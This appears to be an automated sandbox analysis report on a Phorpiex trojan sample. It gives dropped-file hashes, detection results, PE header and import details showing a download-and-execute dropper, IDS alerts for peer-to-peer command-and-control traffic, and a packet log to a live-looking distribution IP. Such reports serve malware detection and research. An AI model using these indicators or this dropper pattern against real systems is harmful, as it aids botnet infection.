                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 65%
                                                                        Reputation:low
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.qj)..9)..9)..9 ..9...9Q..8+..9..B9+..9..@9(..9...9+..9..r9-..9)..9...9..d9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L....%(f.....................x.......t............@..........................................................................'.......................................................................................... ............................text...Z........................... ..`.rdata...7.......8..................@..@.data...@?...@......."..............@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):86016
                                                                        Entropy (8bit):6.395514880379391
                                                                        Encrypted:false
                                                                        SSDEEP:1536:9EKh/S0Fmav8242worjs0nGxMvrEl3/AEHK:iKlWOpsG8MviYEHK
                                                                        MD5:CD1D9C0ED8763E6BB3EE7EFB133DC60E
                                                                        SHA1:F6F3BEA085BA7C13A2956FC0810C2034792F2DDF
                                                                        SHA-256:19EE79B7852C54DE5883404F049F9E85CB0085BAE8132ADA3E46D6F75B24B100
                                                                        SHA-512:77B675FDBFC11BFF45E2438CB1BD73B7FBFA03771C600E37171F684141C82F356E392BA2694285390AEDBB3ECD3306A3C0F8687D0A1940D8D44CAE3A7FC41591
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\1682018248.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 79%
                                                                        Reputation:low
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.qj)..9)..9)..9 ..9...9Q..8+..9..B9+..9..@9(..9...9+..9..r9-..9)..9...9..d9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L...=$(f.....................x.......t............@..........................................................................'.......................................................................................... ............................text...Z........................... ..`.rdata...7.......8..................@..@.data...@?...@......."..............@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):86016
                                                                        Entropy (8bit):6.395549483776685
                                                                        Encrypted:false
                                                                        SSDEEP:1536:gEKh/S0Fmav8242worjs0nGxMvrEl3/AEHK:bKlWOpsG8MviYEHK
                                                                        MD5:36010B83BCCFCD1032971DF9FC5082A1
                                                                        SHA1:9967B83065E3AD82CD6C0C3B02CF08AB707FDE3E
                                                                        SHA-256:99C140F3DBD18B65457BC398730516F3A8C1D0E5BA68AA46C194505BF0F12A98
                                                                        SHA-512:C8008923315D86C06B57E47D9BF81CEC47CDA0DEC6D9F8AA57D7B4C57C7138997486A6F60EB0015BC99755AFEB3D943BC8D9BA83DBB8C9219FA4990296DE1DEF
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\sysvratrel.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\sysvratrel.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 65%
                                                                        Reputation:low
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.qj)..9)..9)..9 ..9...9Q..8+..9..B9+..9..@9(..9...9+..9..r9-..9)..9...9..d9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L....%(f.....................x.......t............@..........................................................................'.......................................................................................... ............................text...Z........................... ..`.rdata...7.......8..................@..@.data...@?...@......."..............@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):4096
                                                                        Entropy (8bit):4.816605532319396
                                                                        Encrypted:false
                                                                        SSDEEP:96:IGTlA8/YYd48cUlqcO4BtyA2ByJ5G+vt9OobxUql79/a0cpHtM:TACXd48onGytA7G+iULRcA
                                                                        MD5:55F401E27EFE1D5F29FCB6DE0A214763
                                                                        SHA1:2FD6DE82580EF483B0BDD3BF410C0EDBF97C852B
                                                                        SHA-256:DDF7AADA209F1C9FB3FB12ADF3F424F160C08D4B3188DF082122C6BE85E63DA0
                                                                        SHA-512:F154C8F3DA4C18204F1957FEF6D2270996CF2B3FB475C9AD275F69D137B1F178CD3C0ECF0F80CCE28FDBFF75991D03A400A3C36992060A8105FF286DA95FA04E
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:_:......P.+n......X.....Y..G....T5.j...._........#+q.....................$j.....[.*......N....X..j......,*.......Q....\/......_;.......#............._;....................[.:.....F5.....m..................F....W.......%..6....m>.O......Z..............Lv.......~....W..A....\/|6....P........A.................I......yQ....%c6.....mJE+...._;.......".....N'......R..(....M,.......m.....T.H.....<.........E......."......q......dc.............x.c......#......^.......N'.j....%..%.....?L&...................>......%.........vR....Y..j....Y.xR.....u........i......>......?]>............X.N....]vc.............N&k.......I......................B......`......lM........8....\.......N'.)....%.........|>....]..E......^.......9V.....x........C............._9.r....M.).....Y.......\/.3.....?F^......:.....-..z....PP.Y....%x......_.W...........Y.5n.............................Q.............x......_;......R.......g.M.....U.V.....Yj.:....N'.6....^.Ez....\|......[\.g.....Y......Y.>.....;[.s....
                                                                        Process:C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):86016
                                                                        Entropy (8bit):6.395549483776685
                                                                        Encrypted:false
                                                                        SSDEEP:1536:gEKh/S0Fmav8242worjs0nGxMvrEl3/AEHK:bKlWOpsG8MviYEHK
                                                                        MD5:36010B83BCCFCD1032971DF9FC5082A1
                                                                        SHA1:9967B83065E3AD82CD6C0C3B02CF08AB707FDE3E
                                                                        SHA-256:99C140F3DBD18B65457BC398730516F3A8C1D0E5BA68AA46C194505BF0F12A98
                                                                        SHA-512:C8008923315D86C06B57E47D9BF81CEC47CDA0DEC6D9F8AA57D7B4C57C7138997486A6F60EB0015BC99755AFEB3D943BC8D9BA83DBB8C9219FA4990296DE1DEF
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 65%
                                                                        Reputation:low
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.qj)..9)..9)..9 ..9...9Q..8+..9..B9+..9..@9(..9...9+..9..r9-..9)..9...9..d9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L....%(f.....................x.......t............@..........................................................................'.......................................................................................... ............................text...Z........................... ..`.rdata...7.......8..................@..@.data...@?...@......."..............@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):5.126377670630054
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:957C4XK6Lt.exe
                                                                        File size:10'240 bytes
                                                                        MD5:f33c75710d0e0463a2528e619c2ee382
                                                                        SHA1:4d2dd071fe274e6a8696448c21eeeecc0cf07e6d
                                                                        SHA256:ec7dd08d03d5d4142c82fc04cea7e948d05641b0a3008a0d8a00b0421b5b04f9
                                                                        SHA512:154242d9880aa6a4f56e697643da089db121fcb1fb8fe7748efed650a6446d259be45aa58ec76f447d2c4bb5649f01acd2304d86321ec8720dfa1182ce0d5bfe
                                                                        SSDEEP:96:zMCbgvMlD60OX6QRdR/9DCop+BYA8v1cVKV15uJxGE9YUBz2qh3C7tCEfq:AeNlD5wrldp+OF0JxTmUBzthc
                                                                        TLSH:73221B07FD8B4020D3E148F017B59B8A8BBD49B3178671DBF3B3D48A4FA43519426AE6
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gd.##.`p#.`p#.`p*}.p!.`p*}.p".`p*}.p6.`p...p(.`p#.ap..`p*}.p .`p*}.p".`pRich#.`p................PE..L... .'f...................
                                                                        Icon Hash:00928e8e8686b000
                                                                        Entrypoint:0x40177f
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x6627BA20 [Tue Apr 23 13:39:44 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:5
                                                                        OS Version Minor:0
                                                                        File Version Major:5
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:5
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:7fda7734b056db13fe95f35927509e47
                                                                        Instruction
                                                                        call 00007F2D5D54A9E9h
                                                                        jmp 00007F2D5D54A3ABh
                                                                        mov edi, edi
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        mov eax, dword ptr [ebp+08h]
                                                                        mov eax, dword ptr [eax]
                                                                        cmp dword ptr [eax], E06D7363h
                                                                        jne 00007F2D5D54A69Ch
                                                                        cmp dword ptr [eax+10h], 03h
                                                                        jne 00007F2D5D54A696h
                                                                        mov eax, dword ptr [eax+14h]
                                                                        cmp eax, 19930520h
                                                                        je 00007F2D5D54A687h
                                                                        cmp eax, 19930521h
                                                                        je 00007F2D5D54A680h
                                                                        cmp eax, 19930522h
                                                                        je 00007F2D5D54A679h
                                                                        cmp eax, 01994000h
                                                                        jne 00007F2D5D54A677h
                                                                        call 00007F2D5D54AA3Eh
                                                                        xor eax, eax
                                                                        pop ebp
                                                                        retn 0004h
                                                                        push 00401789h
                                                                        call dword ptr [00402000h]
                                                                        xor eax, eax
                                                                        ret
                                                                        int3
                                                                        jmp dword ptr [004020B4h]
                                                                        push 00000014h
                                                                        push 00402430h
                                                                        call 00007F2D5D54A8D5h
                                                                        push dword ptr [00403384h]
                                                                        mov esi, dword ptr [0040206Ch]
                                                                        call esi
                                                                        pop ecx
                                                                        mov dword ptr [ebp-1Ch], eax
                                                                        cmp eax, FFFFFFFFh
                                                                        jne 00007F2D5D54A67Eh
                                                                        push dword ptr [ebp+08h]
                                                                        call dword ptr [00402068h]
                                                                        pop ecx
                                                                        jmp 00007F2D5D54A6D9h
                                                                        push 00000008h
                                                                        call 00007F2D5D54A9FFh
                                                                        pop ecx
                                                                        and dword ptr [ebp-04h], 00000000h
                                                                        push dword ptr [00403384h]
                                                                        call esi
                                                                        mov dword ptr [ebp-1Ch], eax
                                                                        push dword ptr [00403380h]
                                                                        call esi
                                                                        pop ecx
                                                                        pop ecx
                                                                        mov dword ptr [ebp-20h], eax
                                                                        lea eax, dword ptr [ebp-20h]
                                                                        push eax
                                                                        lea eax, dword ptr [ebp-1Ch]
                                                                        push eax
                                                                        push dword ptr [ebp+08h]
                                                                        mov esi, dword ptr [00402060h]
                                                                        call esi
                                                                        Programming Language:
                                                                        • [IMP] VS2008 SP1 build 30729
                                                                        • [ASM] VS2008 SP1 build 30729
                                                                        • [ C ] VS2008 SP1 build 30729
                                                                        • [IMP] VS2005 build 50727
                                                                        • [C++] VS2008 SP1 build 30729
                                                                        • [LNK] VS2008 SP1 build 30729
                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x246c0x8c.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x2b0.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x50000x1a4.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x23a00x40.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x104.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000xcda0xe008d36f92c14b086882f6b7735a7484a58False0.5666852678571429data5.744853860221389IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x20000xa340xc004e31adba47e95651616ff672a128ee58False0.42578125data4.356940393520815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x30000x38c0x200202a0f14ba4a024e6a35d5895669b769False0.060546875data0.35275948821577235IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rsrc0x40000x2b00x400554d0cedd69e96ee00c8324ce4da604cFalse0.3623046875data5.194459669718395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x50000x20a0x40081547cdc12e70629c49fae8dfec2b87bFalse0.4189453125data3.4342282719525072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_MANIFEST0x40580x256ASCII text, with CRLF line terminatorsEnglishUnited States0.5100334448160535
                                                                        DLLImport
                                                                        SHLWAPI.dllPathFileExistsW
                                                                        MSVCR90.dll__set_app_type, ?terminate@@YAXXZ, _unlock, _encode_pointer, _lock, _onexit, _decode_pointer, _except_handler4_common, _invoke_watson, _controlfp_s, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _configthreadlocale, _initterm_e, _initterm, _acmdln, exit, _ismbblead, _XcptFilter, _exit, _cexit, __getmainargs, _amsg_exit, srand, rand, memset, __dllonexit, _crt_debugger_hook
                                                                        WININET.dllInternetOpenA, InternetOpenUrlA, InternetOpenW, InternetOpenUrlW, InternetReadFile, InternetCloseHandle
                                                                        urlmon.dllURLDownloadToFileW
                                                                        KERNEL32.dllSetUnhandledExceptionFilter, GetStartupInfoA, GetTickCount, ExpandEnvironmentStringsW, CreateFileW, WriteFile, CloseHandle, DeleteFileW, CreateProcessW, Sleep, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, InterlockedCompareExchange, InterlockedExchange
                                                                        USER32.dllwsprintfW
                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States
                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        04/24/24-10:09:33.285933UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.6212.112.112.84
                                                                        04/24/24-10:07:51.958250UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.6186.94.185.219
                                                                        04/24/24-10:06:57.287872UDP2856563ETPRO TROJAN Phorpiex Domain in DNS Lookup5993653192.168.2.61.1.1.1
                                                                        04/24/24-10:10:13.394595UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.692.46.174.254
                                                                        04/24/24-10:08:32.035369UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.6217.20.222.188
                                                                        04/24/24-10:07:11.867133UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.6120.237.99.181
                                                                        04/24/24-10:09:58.363225UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.646.35.86.48
                                                                        04/24/24-10:09:23.285105UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.689.219.115.32
                                                                        04/24/24-10:09:48.347692UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.6181.114.188.143
                                                                        04/24/24-10:07:31.911742UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.695.71.69.217
                                                                        04/24/24-10:08:11.988207UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.639.53.75.107
                                                                        04/24/24-10:09:53.363437UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.689.236.226.70
                                                                        04/24/24-10:07:46.957752UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.62.180.157.70
                                                                        04/24/24-10:09:18.287284UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.6151.233.73.168
                                                                        04/24/24-10:07:56.957867UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.6197.148.34.173
                                                                        04/24/24-10:07:26.909948UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.682.114.186.50
                                                                        04/24/24-10:08:48.239817UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.641.102.227.47
                                                                        04/24/24-10:08:01.978212UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.65.200.190.214
                                                                        04/24/24-10:07:21.863771UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.65.200.152.6
                                                                        04/24/24-10:10:48.476371UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.62.191.221.216
                                                                        04/24/24-10:10:53.507363UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.6189.158.148.85
                                                                        04/24/24-10:10:43.459613UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.6134.35.81.188
                                                                        04/24/24-10:10:18.414506UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.631.186.49.163
                                                                        04/24/24-10:08:58.253867UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.62.185.146.181
                                                                        04/24/24-10:10:23.425986UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.65.251.56.144
                                                                        04/24/24-10:07:16.864431UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.685.113.19.18
                                                                        04/24/24-10:10:03.378900UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.62.190.224.61
                                                                        04/24/24-10:08:43.222645UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.691.234.219.185
                                                                        04/24/24-10:08:53.254442UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.6134.35.74.170
                                                                        04/24/24-10:10:33.442451UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.65.233.222.244
                                                                        04/24/24-10:08:22.004023UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.695.58.18.206
                                                                        04/24/24-10:09:28.285044UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.6128.65.176.18
                                                                        04/24/24-10:09:43.348638UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.692.47.124.54
                                                                        04/24/24-10:10:58.504112UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.6134.35.163.241
                                                                        04/24/24-10:10:28.442260UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.6134.35.173.140
                                                                        04/24/24-10:09:13.269540UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.637.20.161.137
                                                                        04/24/24-10:07:41.942141UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.636.20.68.95
                                                                        04/24/24-10:08:27.019326UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.631.186.54.5
                                                                        04/24/24-10:08:16.989023UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.689.218.235.182
                                                                        04/24/24-10:09:03.253978UDP2044077ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC5914140500192.168.2.682.194.11.2
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 24, 2024 10:06:57.466809034 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:57.805700064 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:57.805789948 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:57.806061029 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.146322966 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.146378994 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.146421909 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.146450043 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.146461010 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.146465063 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.146500111 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.146507978 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.146538019 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.146548986 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.146574974 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.146584988 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.146612883 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.146621943 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.146650076 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.146656036 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.146687031 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.146694899 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.146724939 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.146729946 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.146771908 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.485579014 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.485640049 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.485680103 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.485719919 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.485754013 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.485785007 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.485784054 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.485821962 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.485822916 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.485860109 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.485863924 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.485886097 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.485901117 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.485913038 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.485939026 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.485955000 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.485976934 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.485989094 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.486013889 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.486030102 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.486053944 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.486064911 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.486093044 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.486108065 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.486130953 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.486140013 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.486170053 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.486196041 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.486207008 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.486211061 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.486244917 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.486249924 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.486284018 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.486295938 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.486321926 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.486346960 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.486360073 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.486367941 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.486453056 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.824354887 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.824419975 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.824459076 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.824481964 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.824497938 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.824551105 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.824645996 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.824664116 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.824744940 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.824758053 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.824783087 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.824810028 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.824822903 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.824853897 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.824861050 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.824898005 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.824903011 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.824956894 CEST4971080192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:06:58.825099945 CEST8049710185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:06:58.825153112 CEST4971080192.168.2.6185.215.113.66
